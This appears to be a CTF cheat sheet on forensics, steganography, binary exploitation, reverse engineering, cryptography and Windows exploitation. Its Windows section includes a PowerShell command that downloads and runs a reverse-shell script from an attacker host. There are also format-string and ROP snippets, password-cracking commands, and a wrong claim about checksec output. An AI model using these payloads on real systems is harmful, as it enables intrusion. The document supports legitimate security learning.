Log files are a record of events that happen on a system. They are used to record everything from user activity to system events. Log files are used to track and record the activities of users, processes, and applications on a system.

In order to effectively analyze log files and identify any suspicious activity, it is important to understand the structure of the log files and the type of information they contain. See Log Analysis for more.

PDF Analysis
We can try to read the metadata using the program pdfinfo. Pdfinfo displays various metadata related to a PDF file, such as title, subject, author, creator, and creation date. If you don’t have pdfinfo installed, you can install it using: sudo apt install poppler-utils

If the PDF file is password protected, another tool named pdfcrack can be used with a wordlist in order to bruteforce the password.

Example:
pdfcrack -q -w /usr/share/wordlists/rockyou.txt encrypted.pdf

Geographical Coordinates
Longitude Latitude

Can be written as:

51 deg 30' 51.90" N, 0 deg 5' 38.73" W

replaced deg with °
51° 30' 51.90" N, 0° 5' 38.73" W

or simply 51.514417, -0.094092

File format

A file type has a specific format - the structure of the file

Typical structure

• Signature file - magic number

Header - typical info to be used to understand the content (metadata)

• Possibly meta data
• Data
• Trailer that completes the file

The format is precisely defined in a specification doc - often publicly available

• Corrupted files: compare file with specification, correct differences with hex editor
• Unknown file types: search for tracks from a file format

PCAP Analysis

Analyze network packet captures to understand traffic patterns and identify security issues.

Common Tools:

• Wireshark (GUI analysis)
• tshark (command line)
• tcpdump (capture packets)

Analysis Techniques:

# Basic filtering
tshark -r capture.pcap -Y "http"
tshark -r capture.pcap -Y "tcp.port == 80"
tshark -r capture.pcap -Y "ip.addr == 192.168.1.100"

# Extract specific data
tshark -r capture.pcap -Y "http.request" -T fields -e http.host -e http.uri
tshark -r capture.pcap -Y "ftp" -T fields -e ftp.request.command

What to Look For:

• Unusual traffic patterns
• Plain text credentials
• DNS exfiltration
• Malware communication
• Port scanning activities

Steganography

Steganography is the practice of hiding a secret message in something that is not secret, for example: A message inside a jpg file, or a binary inside a png.

File Carving
File carving: extract files based on the file format

• Look for file signatures, headers, trailers, etc.
• Originally used in connection with. extraction of files from disk images and memory dumps
• Useful for extracting files stored in other files in stego challenges

File carving tools:

• binwalk
• foremost
• dd (manual extraction)
  • dd if = input.png or = output.txt bs = 1 skip = 1000 count = 32

Tools
Steghide = JPEG(primarily), BMP, WAV and AU
Zsteg = PNG(primarily), BMP

Stegsnow

stegsnow is a program for concealing messages in text files by appending tabs and spaces (whitespace) on the end of lines, and for extracting messages from files containing hidden messages.

Useful commands:
stegsnow -C -m <message> -p <password> <inputfile> <outputfile> compress a message in a text file and save it to a new file stegsnow -C -p <password> <inputfile> <outputfile> uncompress a message in a text file and save it to a new file

Steghide

Steghide is a steganography program that hides data in various kinds of image and audio files, only supports these file formats : JPEG, BMP, WAV and AU. But it’s also useful for extracting embedded and encrypted data from other files. One of the greatest benefits of stegohide, is that it can encrypt data with a passphrase

Install steghide with sudo apt install steghide

Useful commands:

steghide info <filepath>  # displays total embeddable data size in the coverfile    
steghide extract -sf <filepath>  # extracts embedded data from a stegofile  
steghide embed -cf <filepath> -ef <textfile/zip> -p <password>  # embeds a text file or a zip file into a coverfile

Password is optional, if you don’t provide a password it will ask you to enter one.

Example:
Embed a zip file into a jpg file
steghide embed -cf original.jpg -ef test.zip

Stegsolve

Sometimes there is a message or a text hidden in the image itself and in order to view it you need to apply some color filters or play with the color levels. You can do it with GIMP or Photoshop or any other image editing software but stegsolve made it easier. It’s a small java tool that applies many color filters on images.

Installation

wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar

And then run it with

java -jar bin/stegsolve.jar

Stegseek

Stegseek is a lightning fast steghide cracker

After installing stegseek here, you can use it to crack a password protected steghide file with the following command:

stegseek <file>

Stegoveritas

Stegoveritas supports just about every image file, and is able to extract all types of data from it

Installation:

berkankutuk@kali:~$ sudo pip3 install stegoveritas 
berkankutuk@kali:~$ stegoveritas_install_deps

Useful commands:
stegoveritas filename - Simple stego scan
stegoveritas -meta filename - Check file for metadata information
stegoveritas -steghide filename - Check for StegHide hidden info.
stegoveritas -extractLSB filename - Extract a specific LSB RGB from the image.

Stego-toolkit

Collection of steganography tools - helps with CTF challenges

Strings

Strings is a linux tool that displays printable strings in a file. That simple tool can be very helpful when solving stego & binary challenges. Usually the embedded data is password protected or encrypted and sometimes the password is actaully in the file itself and can be easily viewed by using strings. It’s a default linux tool so you don’t need to install anything.

Useful commands:
strings file displays printable strings in the given file
strings -el file displays printable strings in the given file in little-endian format

Exiftool

Sometimes important stuff is hidden in the metadata of the image or the file , exiftool can be very helpful to view the metadata of the files.

Useful commands:
exiftool file shows the metadata of the given file
exiftool -Comment="something" file to add a comment to the metadata of the file

Exiv2

A tool similar to exiftool.

Useful commands:
exiv2 file shows the metadata of the given file

Binwalk

Binwalk is a tool for searching binary files like images and audio files for embedded files and data.

Useful commands:
binwalk <filepath> Displays the embedded data in the given file
binwalk -e <filepath> Displays and extracts the data from the given file

Foremost

foremost is another file carving tool like binwalk, and can be installed with sudo apt-get install foremost.

Useful commands:
Search for all file types in the given image file
foremost image.png

Search for a selection of file types in the given image file (-i image.dd)
foremost -t doc,jpg,pdf,xls -i image.dd

Zsteg

zsteg is a tool that can detect hidden data in png and bmp files.

Useful commands:
zsteg file Runs a simple scan on the given file
zsteg -a file Runs all the methods on the given file
zsteg -E file Extracts data from the given payload (example : zsteg -E b4,bgr,msb,xy name.png)
zsteg -l 0 file Limits the bytes checked to 0

Jsteg

Another command-line tool to use against JPEG Images

Zbarimg

A command-line tool to quickly scan multiple forms of barcodes (QR Codes)

Install with sudo apt install zbar-tools

Useful commands:
zbarimg <filename>

Alternatively, you can use a online tool like zxing to decode QR codes.

Wavsteg

WavSteg is a python3 tool that comes with the package stegolsb which can hide data and files in wav files and can also extract data from wav files.

Useful commands:
python3 WavSteg.py -r -i soundfile -o outputfile extracts data from a wav sound file and outputs the data into a new file

Use an online tool like Databorder Morse or Morse Code World if the wav file contains morse code.

Outguess

OutGuess is a universal tool for steganography that allows the insertion of hidden information into the redundant bits of data sources. The supported formats are JPEG, PPM and PNM.

Useful commands:
To embed the message hidden.txt into the monkey.jpg image:
outguess -k "my secret pass phrase" -d hidden.txt monkey.jpg out.jpg

Retrieve the hidden message from the image:
outguess -k "my secret pass phrase" -r out.jpg message.txt

Options:
-k <key> key
-d <name> filename of dataset
-p <param> parameter passed to destination data handler
-r retrieve message from data

Sonic visualizer

Sonic visualizer is a tool for viewing and analyzing the contents of audio files, however it can be helpful when dealing with audio steganography. You can reveal hidden shapes in audio files or use it to se hidden images inside audio files.

Layer → Add Spectrogram should work

Zero-Width Characters

Zero-width characters are characters that have no width when displayed, but can be used to hide information in text. These characters are often used in steganography to hide messages in plain sight. A useful tool for detecting zero-width characters is Unicode Steganography with Zero-Width Characters .

Memory analysis

Traditionel computer forensics can be made out of volatile memory.

What is volatile data?

• Volatile data: non-permanent data, disappears when the power goes out
• Typically the contents of main memory RAM
• “Live box forensics”
• Analysis takes place on a memory dump - provides a snapshot

Data that can be found in volatile memory

• Running processes and services
• Open files
• Network connections
• Run commands
• Passwords, keys
• Unencrypted data that is encrypted on disk but must be used in decrypted mode in memory
• Stateless malware - malware that lives only in memory
• Even things like a basic screenshot or the user’s clipboard

A tool used for analyzing memory dumps is volatility 3.

Volatility 3

Volatility 3 is a memory forensics framework that allows you to analyze memory dumps.

Useful commands:

• vol.py -f <memory dump> imageinfo - Get information about the memory dump
• vol.py -f <file> windows.filescan.FileScan - List all files in the memory dump
• vol.py -f <file> windows.pslist.PsList - List all processes in the memory dump
• vol.py -f <file> windows.dumpfiles.DumpFiles --virtaddr <address> - Dump a file from the memory dump
  • --pid PID Process ID to include (all other processes are excluded)
  • --virtaddr VIRTADDR Dump a single _FILE_OBJECT at this virtual address
  • --physaddr PHYSADDR Dump a single _FILE_OBJECT at this physical address

Remember to append the --output-dir <directory> flag to save the output to a directory. Or simply redirect the output to a file with > <filename>. I’ve written more about Volatility 3 here.

Disk imaging

Create exact copies of storage devices for forensic analysis without altering original evidence.

Common Tools:

# dd - basic disk imaging
dd if=/dev/sda of=disk_image.raw bs=4M status=progress

# dcfldd - enhanced dd with hashing
dcfldd if=/dev/sda of=disk_image.raw hash=sha256 hashwindow=1G

# ewfacquire - create E01 format
ewfacquire /dev/sda

FTK Imager (Windows/GUI):

• Free forensic imaging tool by AccessData
• Usage: File → Create Disk Image → Select source → Choose format (E01/Raw) → Set destination
• Features: Built-in verification, compression options, case information metadata
• Advantage: User-friendly interface, widely accepted in court
• Download: Available from AccessData website

Image Formats:

• Raw/DD: Bit-for-bit copy, largest file size
• E01/EWF: EnCase format, includes metadata and compression
• AFF: Advanced Forensic Format, open source alternative

Best Practices:

• Use write blockers to prevent modification
• Calculate hash values for integrity verification
• Document chain of custody
• Work with copies, never original evidence

Sleuthkit

The Sleuth Kit is a collection of command-line tools for analyzing disk images and recovering data. It is used by digital forensics professionals and law enforcement agencies to investigate computer crimes.

Examples of tools in The Sleuth Kit:

mmls disk.flag.img # see partitions
fsstat -o 2048 disk.flag.img # determine file system
fls -o 2048 dds2-alpine.flag.img # list files
fls -o 2048 dds2-alpine.flag.img 18290 # list files in a directory
icat -o 2048 dds2-alpine.flag.img 18291 # extract a file
fls -i raw -f ext4 -o 360448 -r disk.flag.img | grep flag # search for files with flag in the name
icat -i raw -f ext4 -o 360448 -r disk.flag.img 2371 # extract a file by inode

-i is the image type, 
-f is the file system type
-r is to recursively display directories

Binary Exploitation

Binary exploitation involves finding and exploiting vulnerabilities in compiled programs. This requires understanding low-level system concepts like memory management, assembly language, and CPU architecture.

Prerequisites:

• Basic understanding of C/C++ programming
• Assembly language fundamentals
• Memory layout concepts (stack, heap, segments)
• Operating system concepts (processes, memory protection)

Essential Tools: GDB, radare2, Ghidra, pwntools, ROPgadget

Practice Safely: Use dedicated platforms like picoCTF, pwnable.tw, or local VMs. Never test on systems you don’t own.

Registers

CPU registers are high-speed storage locations within the processor. In x86-64 architecture, understanding registers is crucial for binary exploitation.

Register Naming Convention:

• 64-bit: RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP
• 32-bit: EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP
• 16-bit: AX, BX, CX, DX, SI, DI, BP, SP
• 8-bit: AL/AH, BL/BH, CL/CH, DL/DH

General Purpose Registers:

Special Registers:

• RIP/EIP/IP: Instruction pointer (current instruction)
• RFLAGS/EFLAGS/FLAGS: Status flags

Example Usage:

mov rax, 0x1234567890abcdef  ; 64-bit
mov eax, 0x12345678          ; 32-bit (clears upper 32 bits)
mov ax, 0x1234               ; 16-bit
mov al, 0x12                 ; 8-bit low
mov ah, 0x34                 ; 8-bit high

The Stack

The stack is a Last-In-First-Out (LIFO) data structure used for function calls, local variables, and return addresses.

Stack Operations:

• PUSH: Add data to top of stack (decreases RSP)
• POP: Remove data from top of stack (increases RSP)

Stack Frame Structure:

High Memory
+-----------------+
| Function Args   |
+-----------------+
| Return Address  | <- Overwrite this for control
+-----------------+
| Saved RBP       |
+-----------------+ <- RBP points here
| Local Variables |
+-----------------+ <- RSP points here
Low Memory

Stack in Function Calls:

1. Arguments pushed onto stack
2. CALL instruction pushes return address
3. Function prologue saves old RBP
4. Local variables allocated
5. Function epilogue restores RBP
6. RET instruction returns to saved address

Security Implications:

• Buffer overflows can overwrite return addresses
• Stack canaries detect corruption
• NX bit prevents stack execution

Stack Overflow

To see if a stack overflow is possible, run the following command:

checksec --file=<executable>

If the output contains Canary found and NX enabled, then a stack overflow is possible. See more about this command here.

Stack Shellcode

Inject and execute shellcode on the stack when NX protection is disabled.

Simple Steps:

1. Fill buffer with your shellcode (machine code)
2. Overflow to overwrite return address
3. Make return address point to your shellcode
4. When function ends, it runs your code

Memory Layout:

[YOUR_SHELLCODE + PADDING][ADDRESS_TO_SHELLCODE]
                           ↑
                    This overwrites return address

What shellcode does:

• Opens a shell (/bin/sh)
• Connects back to your computer
• Runs any command you want

Why it works:

• Old programs let stack execute code
• Modern programs usually block this (NX protection)

Return to Win (Ret2Win)

Jump to a function that’s already in the program instead of writing your own code.

The Idea:

• Program has a “win” function that gives you a flag/shell
• You just need to call that function
• Much easier than writing shellcode

How it works:

1. Find the “win” function address (like 0x401234)
2. Overflow the buffer
3. Replace return address with win function address
4. Program jumps to win function and you get the flag

Memory Layout:

[JUNK_DATA][WIN_FUNCTION_ADDRESS]
            ↑
    Program jumps here instead of normal return

Why it’s easier:

• No need to write machine code
• Just redirect to existing code
• Works even with some protections

Calling Conventions

How programs pass information to functions. Like rules for a conversation.

Linux 64-bit (most common):

• First argument goes in RDI register
• Second argument goes in RSI register
• Third in RDX, fourth in RCX, etc.
• Function returns answer in RAX

Example - calling system("/bin/sh"):

mov rdi, "/bin/sh"    # Put "/bin/sh" in first argument
call system           # Call function

Why this matters for exploits:

• To call functions, you need to put arguments in right places
• If you want system("/bin/sh"), you need “/bin/sh” in RDI first
• Different operating systems have different rules

32-bit is different:

• All arguments go on the stack (no registers)
• Simpler but less efficient

Global Offset Table (GOT)

A phone book that programs use to find function addresses. Table that stores addresses of external functions for dynamic linking.

Purpose:

• Resolve function addresses at runtime
• Enable position-independent code
• Support shared libraries

What it does:

• Programs don’t know where printf() or other functions live in memory
• GOT stores the actual addresses of these functions
• When program calls printf(), it looks up the address in GOT first

GOT vs PLT:

• GOT: Contains actual function addresses
• PLT: Contains jump stubs to GOT entries

GOT Overwrite Attack:

1. Find GOT entry for target function
2. Overwrite with address of controlled function
3. When target function called, redirects to attacker code

Simple Example:

1. Program calls printf(“Hello”)
2. Program looks in GOT: “printf is at address 0x123456”
3. You change GOT: “printf is at address 0x789abc” (where system() lives)
4. Program calls system(“Hello”) instead of printf(“Hello”)

Finding GOT entries:

# Find GOT entries
objdump -R binary
readelf -r binary

# In GDB, examine GOT
x/gx 0x404018  # GOT entry address

Common Targets:

• printf → system
• exit → main (for infinite loop)
• malloc → system

Why this works:

• Program trusts its own phone book (GOT)
• If you can write to GOT, you control function calls
• Great for when you can’t directly control execution flow

Buffers

Buffer Overflow

Buffer overflow is a type of security vulnerability that occurs when a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations. This can cause the program to crash or, in the case of a remote attacker, to execute arbitrary code on the system.

Quick note:

• If some C code contains the function gets() or strcpy(), it is vulnerable to a buffer overflow attack.
• An important part of the memory we can overwrite is the instruction pointer (IP/return address), which is called the eip on 32-bit machines, and rip on 64-bit machines. The IP points to the next instruction to be executed, so if we redirect the eip in a binary to point to a different location, we can execute arbitrary code.
• The top of the stack is pointed to by the SP (or stack pointer) which is called esp in 32-bit machines.

Buffer Overflow Exploitation example

A very simple example of a buffer overflow exploit looks like the following:

python -c "print ('A' * 100)" | ./<executable>

Variable Overwrite

Change nearby variables by overflowing a buffer. Easier than full exploitation.

The Setup:

char password[10];
int is_admin = 0;        // This is next to password in memory

gets(password);          // Dangerous! No size check
if (is_admin) {
    printf("You're admin!\n");
}

The Attack:

• Type more than 10 characters
• Extra characters overflow into is_admin variable
• is_admin becomes non-zero (true)
• You get admin access

Memory Layout:

[password buffer][is_admin]
[AAAAAAAAAA]     [0]        ← Normal
[AAAAAAAAAAAA]   [AA]       ← Overflow! is_admin now = AA (non-zero)

Why it works:

• Variables stored next to each other in memory
• No boundary checking on input
• Simpler than controlling execution flow

Return Oriented Programming (ROP)

Return Oriented Programming (ROP) works by chaining together small pieces of code, called “gadgets,” that are already present in the target program’s memory space to perform a series of operations that the attacker desires. Each gadget typically ends with a “return” instruction that tells the program where to continue executing code after the gadget has finished.

By carefully selecting and chaining together gadgets that end with a return instruction, attackers can construct a “ROP chain” that allows them to execute their own code on the target system. This technique can be used to bypass security measures such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

Binary Security

A tool that can detect binary security security mechanisms is checksec. I’ve written about the tool here.

No eXecute (NX)

NX is a hardware security feature that prevents execution of code from non-executable memory regions. This helps to prevent certain types of attacks, such as buffer overflow exploits, which attempt to execute malicious code by overwriting the memory. Also means no shellcode can be executed from the stack.

Position Independent Executable (PIE)

PIE is a security feature that randomizes the base address of the program’s code and data sections at runtime. This makes it more difficult for an attacker to predict the memory address of a vulnerable function or piece of data, and thus makes it harder to exploit certain types of vulnerabilities.

Address Space Layout Randomization (ASLR)

ASLR is a security technique that randomizes the memory layout of a process at runtime. This makes it more difficult for an attacker to predict the memory address of a vulnerable function or piece of data, and thus makes it harder to exploit certain types of vulnerabilities.

Stack Canaries

Stack Canaries is a security mechanism that detects buffer overflow attacks. It works by placing a small value, known as a “canary,” on the stack before the return address. If a buffer overflow occurs, the canary value will be overwritten, and the program will detect the modification and terminate the execution.

Relocation Read-Only (RELRO)

RELRO is a security feature that makes certain sections of the program read-only after the dynamic linker has resolved all symbols. This prevents an attacker from overwriting important data or functions in memory, and can help to prevent certain types of attacks, such as the Global Offset Table (GOT) overwrite.

The Heap

Heap Exploitation

Attack memory that programs allocate dynamically (with malloc).

What’s the heap?

• Area where programs store data that can grow/shrink
• Unlike stack (fixed size), heap is flexible
• Programs use malloc() to get memory, free() to return it

Common Mistakes Programs Make:

• Use after free: Use memory after giving it back
• Double free: Return the same memory twice
• Heap overflow: Write past the end of allocated space
• Heap spray: Fill heap with controlled data

Simple Example:

char *data = malloc(10);     // Get 10 bytes
strcpy(data, "This is way too long!");  // Write 20+ bytes!
free(data);                  // Return memory
strcpy(data, "hello");       // Use after free - CRASH!

Why it’s hard:

• Heap layout is complex and changes
• Requires understanding memory management
• Usually need multiple bugs to exploit

Format String Vulnerability

A format string vulnerability is a type of software vulnerability that occurs when a program uses user input to construct a format string for the printf or scanf functions without properly validating or sanitizing the input. This can allow an attacker to execute arbitrary code or read sensitive data from the program’s memory. Read more about the functions here.

The format specifiers are the following:

Format String Vulnerability Exploitation example

A simple example of a format string vulnerability is the following:

python -c "print ('%x ' * 100)" | ./<executable> # Local
python -c "print ('%x ' * 100)" | nc <host> <port> # Remote

Its also possible to brute force the stack for values.

from pwn import *

for i in range(1, 50):
    r = remote('<host>', <port>)
    r.sendline('%' + str(i) + '$s')
    print('%' + str(i) + '$s')
    print(r.recv())

Integer Overflow

Integer overflow is a type of software vulnerability that occurs when an integer value is incremented beyond its maximum value, causing it to “wrap around” to a negative value. This can lead to unexpected behavior in the program, such as crashes or security vulnerabilities.

Data types

BYTE = 8 bits
WORD = 16 bits
DWORD = Double Word (32 bits)
QWORD = Quad Word (64 bits)

ASLR Bypass

Return to PLT (Ret2plt)

Bypass ASLR by calling functions through the Procedure Linkage Table.

Concept:

• PLT entries have fixed addresses
• Can call system functions via PLT
• Useful when ASLR randomizes library addresses

Common Technique:

1. Find PLT entry for desired function
2. Set up arguments in registers/stack
3. Return to PLT entry

Example:

# Call system("/bin/sh") via PLT
rop = ROP(binary)
rop.system(next(binary.search(b"/bin/sh")))

PLT vs Direct Call:

• PLT: Fixed address, works with ASLR
• Direct: Randomized address, fails with ASLR

Reverse Engineering

Reverse-engineering is the creative process of analyzing software and understanding it without having access to the source code. It is the process by which software is deconstructed in a way that reveals its innermost details such as its structure, function and operation.

Assembly Language

Find the in-depth content for the Assembly x86-64 language here.

Assembly is the low-level programming language that directly corresponds to machine code instructions.

Common Instructions:

• MOV: Move data between locations
• ADD/SUB: Arithmetic operations
• CMP: Compare values
• JMP/JE/JNE: Jump instructions
• CALL/RET: Function calls
• PUSH/POP: Stack operations

Intel vs AT&T Syntax:

# Intel syntax
mov eax, 5
add eax, ebx

# AT&T syntax  
movl $5, %eax
addl %ebx, %eax

Useful for:

• Reverse engineering binaries
• Understanding exploits
• Optimizing performance-critical code

Disassemblers & Debuggers

A disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler. A debugger is a computer program that is used to test and debug other programs.

ltrace & strace

strace is a debugging utility in Linux used to monitor the system calls used by a program and all the signals it receives.

ltrace is a debugging utility in Linux used to display the calls a user space application makes to shared libraries. It traces the library calls made by a process and the signals received by the process.

gdb

GDB, the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes – or what another program was doing at the moment it crashed.

berkankutuk@kali:~$ gdb <binary file> # opens the binary file in gdb

(gdb)> set disassembly-flavor intel # sets the disassembly flavor to intel

(gdb)> break <function_name> # sets a breakpoint at the given function
(gdb)> break *<addr> # sets a breakpoint at the given address
(gdb)> si # steps through the program one instruction at a time
(gdb)> ni # steps over the current instruction
(gdb)> run # runs the program until it reaches the first breakpoint
(gdb)> run <input file> # runs the program with the given input file
(gdb)> disassemble <function_name> | main # disassembles the given function
(gdb)> x/s <addr> # prints a string from memory address
(gdb)> continue # continues the execution of the program
(gdb)> info registers # prints the values of the registers
(gdb)> info variables # prints the values of the variables
(gdb)> info functions # prints the functions
(gdb)> set $eax=0 # sets the value of the eax register to 0
(gdb)> exploit # runs the exploit
(gdb)> x # inspect memory locations
(gdb)> quit # quits gdb

radare2

Radare2 is an open-source framework that can perform disassembly, debugging, analysis, comparing data and manipulation of binary files.

berkankutuk@kali:~$ r2 <binary file>` # opens the binary file in radare2
berkankutuk@kali:~$ r2 -d <binary file>` # opens the binary file in radare2 in debug mode 

# General
[0x00400510]> aaa # Analyze the binary
[0x00400510]> afl # List functions
[0x00400510]> s main # Go to main function
[0x00400510]> pdf # Print disassembled function
[0x00400510]> s/ password # Search for data within the code
[0x00400510]> V # Hex view
[0x00400510]> VV # Visual mode

# Debug mode
[0x00400510]> db <addr> # Set breakpoint at address
[0x00400510]> dc # Continue execution
[0x00400510]> dr # Show registers
[0x00400510]> s # step instruction

Ghidra

Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency (NSA). It is a free and open-source software reverse engineering tool released under the Apache License 2.0.

berkankutuk@kali:~$ ghidraRun <binary file>` # opens the binary file in ghidra

Ghidra GUI

Right click -> Patch Instruction -> Values # Patch the instruction with the given values 
File -> Export Program -> Export as ELF # Export the binary as an ELF file

Symbol Tree -> Functions # List functions (ex. Main)

Call Graphs

Cytoscape is a tool for network analysis and visualization that can be used to see call graphs.

Useful functions:

• Layout -> Grid View = Show a grid view of the nodes.
• Pathlinker = Find paths between nodes. Needs a source and a target node. K = number of paths to find. Is mostly one in CTF situations.

Decompilers

A decompiler is a computer program that takes an executable file as input, and attempts to create a high level code (like C/C++, Java).

Jar files

A jar file is a Java archive file that can contain multiple files and folders. Jar files are mainly used for archiving, compression and decompression. Jar files are similar to zip files, but jar files can have additional attributes that are required for a Java application to run.

To decompile a jar file, procyon can be used. For online DogBolt is a good option.

berkankutuk@kali:~$ sudo apt-get install -y procyon-decompiler
berkankutuk@kali:~$ procyon -jar <jar file> -o <output directory>

.NET Decompilers

• dotPeek - Free .NET decompiler and assembly browser
• ILSpy - .NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!

Cryptography

Cryptography is the foundation of modern security, protecting data through mathematical algorithms. Understanding crypto principles is essential for both securing systems and attacking weak implementations.

Learning Path:

1. Basics: Hashing, symmetric vs asymmetric encryption
2. Classical: Caesar, Vigenère, substitution ciphers
3. Modern: AES, RSA, elliptic curves
4. Applications: TLS/SSL, digital signatures, key exchange
5. Attacks: Weak implementations, side channels, quantum threats

Essential Tools: OpenSSL, hashcat, John the Ripper, CyberChef, cryptographic libraries

Implementation Warning: Never implement crypto from scratch in production. Use established, audited libraries.

Generating Keys

To generate a private key we use the following command (8912 creates the key 8912 bits long):
openssl genrsa -aes256 -out private.key 8912

To generate a public key we use our previously generated private key:
openssl rsa -in private.key -pubout -out public.key

Lets now encrypt a file (plaintext.txt) using our public key:
openssl rsautl -encrypt -pubin -inkey public.key -in plaintext.txt -out encrypted.txt

Now, if we use our private key, we can decrypt the file and get the original message:
openssl rsautl -decrypt -inkey private.key -in encrypted.txt -out plaintext.txt

Cryptographic Methods

Cryptii

Cryptii has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more.

Keyboard Shift

Dcode If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift…

Bit Shift

Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x » 1 ) or ( x « 1 ).

Bit Calculator is a good tool to calculate bit shifts. For other bit operations, use the RapidTables tool.

Reversed Text

Sometimes a “ciphertext” is just as easy as reversed text. Don’t forgot to check under this rock! You can reverse a string in Python like so:

“UOYMORFEDIHOTGNIYRTEBTHGIMFTCA.TAHTTERCESASISIHT”[::-1]

XOR

ANY text could be XOR’d. Techniques for this are Trey’s code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it’s hex form (as in \xde\xad\xbe\xef etc..) Note that you can do easy XOR locally with Python like so (you need pwntools installed):

python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")

Vigenère Cipher

The Vigenère cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. It employs a form of polyalphabetic substitution.

The encryption of the original text is done using the Vigenère square or Vigenère table. It is a table of alphabets written out 26 times in different rows, each alphabet shifted cyclically to the left compared to the previous alphabet, corresponding to the 26 possible Caesar ciphers. At different points in the encryption process, the cipher uses a different alphabet from one of the rows. The alphabet used at each point depends on a repeating keyword.

Caesar Cipher

The Caesar cipher is one of the earliest known and simplest ciphers. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet. For example, with a left shift of 3, D would be replaced by A, E would become B, and so on. The method is named after Julius Caesar, who used it in his private correspondence.

ROT13

ROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher which was developed in ancient Rome.

Substitution Cipher

A substitution cipher is a method of encoding by which units of plaintext are replaced with ciphertext, according to a fixed system; the “units” may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing the inverse substitution.

Useful tools for substitution ciphers are Cryptii and Dcode.

Encoding

Encoded data can be decoded immediately, without keys. It’s NOT a form of encryption, it just a way of representing data.

A very popular encoding is Base64.
The basic idea behind Base64 encoding is to represent binary data using only ASCII characters. To do this, Base64 converts each 3 bytes of binary data into 4 bytes of ASCII text. The 3 bytes of binary data are divided into 4 groups of 6 bits each, which are then represented by a character from a set of 64 characters. The 64 characters used in Base64 are:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

The equals sign (=) is also used as a padding character to ensure that the length of the output is a multiple of 4 characters.

For example, let’s say we want to encode the binary data “011000010110001001100011”, which represents the ASCII characters “abc”. To encode this data in Base64, we first divide it into 3-byte groups:

01100001 01100010 01100011

Then we divide each 3-byte group into 4 groups of 6 bits each:

011000 010110 001001 100011

Next, we convert each group of 6 bits to its corresponding Base64 character:

Y W J j

So the encoded Base64 string for “abc” is “YWJj”.

Encoding a string in the terminal

echo -n "Hello World" | base64

Decoding a string in the terminal

echo -n "SGVsbG8gV29ybGQ=" | base64 -d

Encoding/Decoding files

base64 /path/to/file > output.txt # Encoding
base64 -d /path/to/file > output.txt # Decoding

Hashing

Hashing is used for 2 main purposes in Cyber Security. To verify integrity of data, or for verifying passwords.

plaintext ➡️ hash
hash ⛔ plaintext

Doing a lookup in a sorted list of hashes that are not salted is quite fast, much much faster than trying to crack the hash. But in case we have to crack, then its done by hashing a large number of different inputs (often rockyou.txt, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash.

Tools like Hashcat and John the Ripper are normally used for this.

Ciphers

Methods for encrypting and decrypting data to protect confidentiality.

Classical Ciphers:

• Caesar: Shift letters by fixed amount
• Vigenère: Use repeating key for shifting
• Substitution: Replace each letter with another
• Transposition: Rearrange letter positions

Modern Ciphers:

• AES: Advanced Encryption Standard (symmetric)
• RSA: Rivest-Shamir-Adleman (asymmetric)
• DES: Data Encryption Standard (obsolete)

Examples:

# Caesar cipher (shift by 3)
plaintext:  HELLO
ciphertext: KHOOR

# Simple substitution
A->Z, B->Y, C->X, etc.

Breaking Ciphers:

• Frequency analysis
• Known plaintext attacks
• Brute force (short keys)
• Mathematical weaknesses

Encryption (RSA)

Symetric encryption

plaintext ➡️ 🔑 ➡️ ciphertext
plaintext ⬅️ 🔑 ⬅️ ciphertext
(🔑 shared key)

Asymetric encryption

plaintext ➡️ 🔑 ➡️ ciphertext
plaintext ⬅️ 🗝 ⬅️ ciphertext
(🔑 public key, 🗝 private key

Public key to encrypt, private key to decrypt.

Cracking ecrypted files

If you are using Kali linux or Parrot OS, you should have a binary add on called gpg2john. This binary program allows us to convert the gpg file into a hash string that john the ripper can understand when it comes to brute-forcing the password against a wordlist.

How to use it (GPG example):

gpg2john encrypted_file.txt.gpg > hash.txt

Then you can use john the ripper to crack the password.

john --wordlist=/usr/shared/wordlists/rockyou.txt --format=gpg hash.txt

The result should reveal the password if you have used a strong wordlist that contains it.

Windows Exploitation

Active directory

Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network.

Other related terms include: Domain controllers, Trusts & Policies, Services, Authentication & Cloud security.

Windows Reverse Shells

If you have access to PowerShell, you can get a Reverse shell by using nishang’s Invoke-PowerShellTcp.ps1 script inside of the Shells directory. Be sure to add the function call example to the bottom of your script, so all you need to to do to host it is (on your Attacker machine):

python -m SimpleHTTPServer

and then on the victim machine:

powershell IEX( New-Object Net.WebClient).DownloadString("http://10.10.14.6:8000/reverse.ps1") )

Also, if you want to have nice up and down arrow key usage within your Windows reverse shell, you can use the utility rlwrap before your netcat listener command.

rlwrap nc -lnvp 9001

Samba (SMB)

smbmap tells you permissions and access, which smbclient does not do!

smbmap
To try and list shares as the anonymous user (this doesn’t always work for some weird reason)
smbmap -H <IP> -u anonymous

enum4linux
Another enumeration tool is enum4linux which can be used like this:
enum4linux <ip>

smbclient
You can use smbclient to look through files shared with SMB. To list available shares:
smbclient -m SMB2 -N -L //10.10.10.125/

The -L flag specifies that we want to retrieve a list of available shares on the remote host, while -N suppresses the password prompt.

For more, see this page: Samba

